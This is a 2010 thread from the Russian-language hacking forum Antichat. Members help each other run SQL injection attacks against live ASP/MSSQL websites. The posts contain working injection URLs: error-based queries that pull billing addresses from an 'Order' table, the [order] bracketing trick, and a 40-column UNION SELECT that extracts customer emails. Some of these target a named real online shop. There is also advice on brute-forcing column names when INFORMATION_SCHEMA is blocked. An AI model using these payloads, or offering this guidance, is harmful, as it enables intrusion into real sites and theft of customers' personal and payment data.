ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
22.02.2010, 15:34
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от Strilo4ka
я это не писал, но то итак понятно что если ничне не передаеться - на главной такая ошибка . От пользователя ниче не получаеться то да...
А че может файл был удален или изменен и потому возниакет ошибка . Если дописать то все ок... Ктсати та че говорить надо смотреть действительно. Допустим если нет данных то по умолчанию что то должно выводиться, а если есть то инклуд другой
Не смотрев на этот сайт, я могу сказать, что эта ошибка возникает потому, что файла news.php нету. И это всего лишь раскрытие... Так что не надо тут выдумывать, что это инклуд. И рассказывать о том, что ты знаешь о фильтрах, еще и MQ совать сюда. И еще, скажи - причем здесь /etc/shadow и /etc/passwd? Ты бы еще про мороженое тут написал. Этого не надо! Человек задал конкретный вопрос, если знаешь конкретный ответ - отвечай, нет - пройди мимо. Еще раз говорю, НЕ НАДО писать здесь о том, что ты знаешь, и строить из себя "умного".
PS:
Сообщение от Strilo4ka
ну как - ищеш что нибуть и пытаешся подключить!!!
Отличный ответ.
|
|
|
Ошибка при получении данных из таблицы Order |
22.02.2010, 15:41
|
|
Новичок
Регистрация: 28.09.2009
Сообщений: 19
Провел на форуме:
61814
Репутация:
28
|
|
Ошибка при получении данных из таблицы Order
http://site.com/cart.asp?cartItemQuantity6=0&cartItemId=76'+or+1=( select+top+1+orderCardBillAddress1+from+Order)--
При попытке получить данные их таблицы Order выдает ошибку:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Incorrect syntax near the keyword 'Order'.
/cart.asp, line 352
я так понимаю проблема в том что SQL воспринимает название таблицы как "order by", так как данные из таблиц с другим названием получаются без проблем. Как представить название таблицы Order чтобы ее SQL принял как имя таблицы? Пробовал переводить в HEX, но это не помогло. Заранее спасибо за помощь!
|
|
|
|
22.02.2010, 15:47
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708
Репутация:
208
|
|
mailbrush
 А я думал все сторонники стеба и флуда. спасибо за понимание. таких людей побольше бы в ачате!
Strilo4ka
Мэн, не в обуду, но я не шаря в этом деле - могу сказать, что тут /etc/shadow и /etc/passwd вообше не причем, т.к. из путей видно, что сервер на WINDOWS. По этому речь о /etc/ идти не может.
-------------
И как я понял - это НЕ уязвимость, а просто недоделка веб мастера. Сайт чуть ли не умерший. наверно туда очень редко заходят. сайт персональный (певец). Америкосы делали 
Вопрос пока в силе - можно ли (и каким образом) пользоватся этим ?
Если логично дуать, то там стоит MSSQL хотя.. может и нет..
|
|
|
|
22.02.2010, 16:01
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
B1t.exe, кроме как раскрытие путей ты не чего не поимешь, т.к. там тупа нет подключаемого файла news.php
Там типа вот этого
PHP код:
<?php
include "news.php";
?>
а не
PHP код:
<?php
include $_GET[page];
?>
т.е. на запрос повлиять нельзя.
3blK0B, читай http://forum.antichat.ru/thread30501.html
Последний раз редактировалось SeNaP; 22.02.2010 в 16:06..
|
|
|
|
22.02.2010, 16:17
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708
Репутация:
208
|
|
SeNaP
хмм. так и понял, что это не уязвимость
вот пробую такие комбинации:
Код:
http://www.site.com/index.php? it=1' or 1=(select db_name())--
http://www.site.com/index.php?it=1'
http://www.site.com/index.php?it=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+IN FORMATION_SCHEMA.TABLES)--
все вкидывают на главную страницу и никаких ошибок.
может там не MSSQL ? или все же хорошо защищен от иньекции ?
|
|
|
|
22.02.2010, 16:24
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
Сообщение от B1t.exe
вот пробую такие комбинации:
Код:
http://www.site.com/index.php? it=1' or 1=(select db_name())--
http://www.site.com/index.php?it=1'
http://www.site.com/index.php?it=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+IN FORMATION_SCHEMA.TABLES)--
все вкидывают на главную страницу и никаких ошибок.
может там не MSSQL ? или все же хорошо защищен от иньекции ?
на
http://www.site.com/index.php? it=1'
or
http://www.site.com/index.php? it=-1'
что выдаёт?
|
|
|
|
22.02.2010, 16:33
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
Сообщение от 3blK0B
http://site.com/cart.asp?cartItemQuantity6=0&cartItemId=76'+or+1=( select+top+1+orderCardBillAddress1+from+Order)--
При попытке получить данные их таблицы Order выдает ошибку:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Incorrect syntax near the keyword 'Order'.
/cart.asp, line 352
я так понимаю проблема в том что SQL воспринимает название таблицы как "order by", так как данные из таблиц с другим названием получаются без проблем. Как представить название таблицы Order чтобы ее SQL принял как имя таблицы? Пробовал переводить в HEX, но это не помогло. Заранее спасибо за помощь!
from [order], from "order"
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
|
|
|
|
22.02.2010, 16:46
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от Darren
никак не могу подобрать названия таблиц.Нашёл orders но не могу подобрать столбцы. Доступа в INFORMATION_SCHEMA.TABLES и Coloms нет помогите раскрутить скулю. Help please
http://www.limenatural.co.uk/latest.asp?ID=&offset=&prod_id=8896%20union+select %201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37,38,39,40,TABLE_NAME%20FROM%20INFORMATION_SCHE MA.TABLES--+
Если доступа к information_schema нету, выход - брут (перебор) столбцов. Вряд ли за тебя кто-то это сделает.
Сообщение от Strilo4ka
а по поводу етс/шадов на пути не посмотрел сори
Даже, если бы это была unix-подобная система, /etc/shadow не прочтешь, даже если юзер = root.
Последний раз редактировалось mailbrush; 22.02.2010 в 16:57..
Причина: слишком жесткая шутка была :)
|
|
|
|
22.02.2010, 17:55
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708
Репутация:
208
|
|
Сообщение от SeNaP
на
http://www.site.com/index.php? it=1'
or
http://www.site.com/index.php? it=-1'
что выдаёт?
ноль реакции  кидает на галвную (ссылка не меняется)
|
|
|
|
22.02.2010, 17:56
|
|
Banned
Регистрация: 14.06.2008
Сообщений: 34
Провел на форуме:
119183
Репутация:
13
|
|
Почему может выходить такая ошибка когда я пытаюсь вывести данные
запрос типа:
http://xxx/latest.asp?ID=&offset=&prod_id=8896%20union+select %201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37,38,39,40,email%20from%20orders%20--
ADODB.Command error '800a0d5d'
Application uses a value of the wrong type for the current operation.
/ProdDetail1.asp, line 20
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
